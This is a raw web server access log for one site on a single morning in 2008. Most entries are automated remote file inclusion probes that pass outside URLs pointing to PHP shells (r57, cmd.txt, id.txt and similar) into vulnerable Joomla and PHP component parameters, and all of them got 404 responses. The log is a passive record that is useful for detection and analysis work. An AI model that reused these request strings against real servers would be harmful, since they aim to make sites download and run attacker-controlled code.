91.142.208.54 - - [25/Feb/2008:07:16:38 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:07:16:49 -0800] "GET //skin/zero_vote/error.php?dir=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.234.68.78 - - [25/Feb/2008:07:17:06 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.68.78 - - [25/Feb/2008:07:17:06 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:07:17:34 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:07:17:34 -0800] "GET /logs/config.inc.php?path_escape=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:07:18:37 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:07:18:37 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.104.160.59 - - [25/Feb/2008:07:18:48 -0800] "GET /bikes/dteel/2008_02_23/IMG_4582s.JPG HTTP/1.1" 200 163504 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.37 - - [25/Feb/2008:07:18:48 -0800] "GET /bikes/dteel/2008_02_23/IMG_4598s.JPG HTTP/1.1" 200 227196 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.37 - - [25/Feb/2008:07:18:48 -0800] "GET /bikes/dteel/2008_02_23/IMG_4600s.JPG HTTP/1.1" 200 280447 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.38 - - [25/Feb/2008:07:18:49 -0800] "GET /bikes/dteel/2008_02_23/IMG_4578s.JPG HTTP/1.1" 200 161693 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.38 - - [25/Feb/2008:07:18:49 -0800] "GET /bikes/dteel/2008_02_23/IMG_4563s.JPG HTTP/1.1" 200 322574 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.59 - - [25/Feb/2008:07:18:52 -0800] "GET /bikes/dteel/2008_02_23/IMG_4578s.JPG HTTP/1.1" 200 161693 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.38 - - [25/Feb/2008:07:18:52 -0800] "GET /bikes/dteel/2008_02_23/IMG_4598s.JPG HTTP/1.1" 200 227196 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.38 - - [25/Feb/2008:07:18:52 -0800] "GET /bikes/dteel/2008_02_23/IMG_4582s.JPG HTTP/1.1" 200 163504 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.37 - - [25/Feb/2008:07:18:52 -0800] "GET /bikes/dteel/2008_02_23/IMG_4600s.JPG HTTP/1.1" 200 280447 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
75.104.160.37 - - [25/Feb/2008:07:18:52 -0800] "GET /bikes/dteel/2008_02_23/IMG_4563s.JPG HTTP/1.1" 200 322574 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PeoplePal 3.0)" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:07:18:54 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:07:19:01 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:07:19:01 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:07:19:31 -0800] "GET /logs/access_080118.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:07:19:32 -0800] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:07:19:36 -0800] "GET //skin/zero_vote/error.php?dir=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:07:20:13 -0800] "GET /logs/access.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:20:23 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:20:24 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:20:24 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:20:34 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:20:34 -0800] "GET //Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:20:35 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:07:20:45 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:07:20:46 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:21:27 -0800] "GET /logs/access_080131.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:21:27 -0800] "GET //Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:21:28 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:21:36 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:07:21:56 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:07:21:56 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:22:11 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:22:11 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:22:11 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
211.234.102.6 - - [25/Feb/2008:07:22:20 -0800] "GET /components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://www.geocities.com/ntchack/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:22:27 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:22:27 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:22:28 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:22:29 -0800] "GET /logs/access.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:22:45 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.35.84.213 - - [25/Feb/2008:07:22:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madinaedu.gov.sa/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:22:52 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:22:52 -0800] "GET //Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:22:53 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:22:55 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:22:55 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:22:55 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.236.107 - - [25/Feb/2008:07:23:03 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:23:08 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:23:09 -0800] "GET //Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:23:09 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:23:11 -0800] "GET /logs/access_071220.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:23:42 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:23:55 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:24:01 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:07:24:22 -0800] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:25:52 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:25:53 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:26:08 -0800] "GET /logs/access.log//update/update5.php?lang=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:26:08 -0800] "GET //update/update5.php?lang=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:26:09 -0800] "GET /logs//update/update5.php?lang=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.148.95.146 - - [25/Feb/2008:07:26:11 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:26:12 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:26:13 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:26:22 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:26:22 -0800] "GET //Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:26:22 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:27:25 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:27:25 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:27:25 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:07:27:30 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:07:27:30 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:07:27:30 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
4.79.181.213 - - [25/Feb/2008:07:27:34 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:07:27:36 -0800] "GET /logs/access_071220.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:07:27:36 -0800] "GET /administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:07:27:36 -0800] "GET /logs/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:07:27:36 -0800] "GET /logs/access_071230.log/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.35.66.58 - - [25/Feb/2008:07:27:37 -0800] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.58.22 - - [25/Feb/2008:07:27:57 -0800] "GET //Neos_Chronos/header.php?base_folder=http://mobee.ru/usr/xml/c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.187.94.179 - - [25/Feb/2008:07:28:18 -0800] "GET /logs/access_080121.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:28:22 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.79.217.33 - - [25/Feb/2008:07:28:25 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:28:56 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.192.194.37 - - [25/Feb/2008:07:29:50 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.sambis.ru/forum/files/sambis.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.189.222.164 - - [25/Feb/2008:07:29:52 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.geocities.com/aroganz1/tools/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:07:30:47 -0800] "GET /logs/access_080201.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:07:30:47 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:07:30:47 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:31:12 -0800] "GET //update/update5.php?lang=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:07:31:28 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://madinaedu.gov.sa/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:07:31:51 -0800] "GET /logs/access_080118.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:07:31:52 -0800] "GET /logs/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:31:57 -0800] "GET /logs/access.log//update/update5.php?lang=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:31:57 -0800] "GET //update/update5.php?lang=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:31:57 -0800] "GET /logs//update/update5.php?lang=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:32:01 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.79.75.195 - - [25/Feb/2008:07:32:41 -0800] "GET /logs/access.log/index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.242.99.80 - - [25/Feb/2008:07:33:49 -0800] "GET /logs/access.log/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:34:16 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
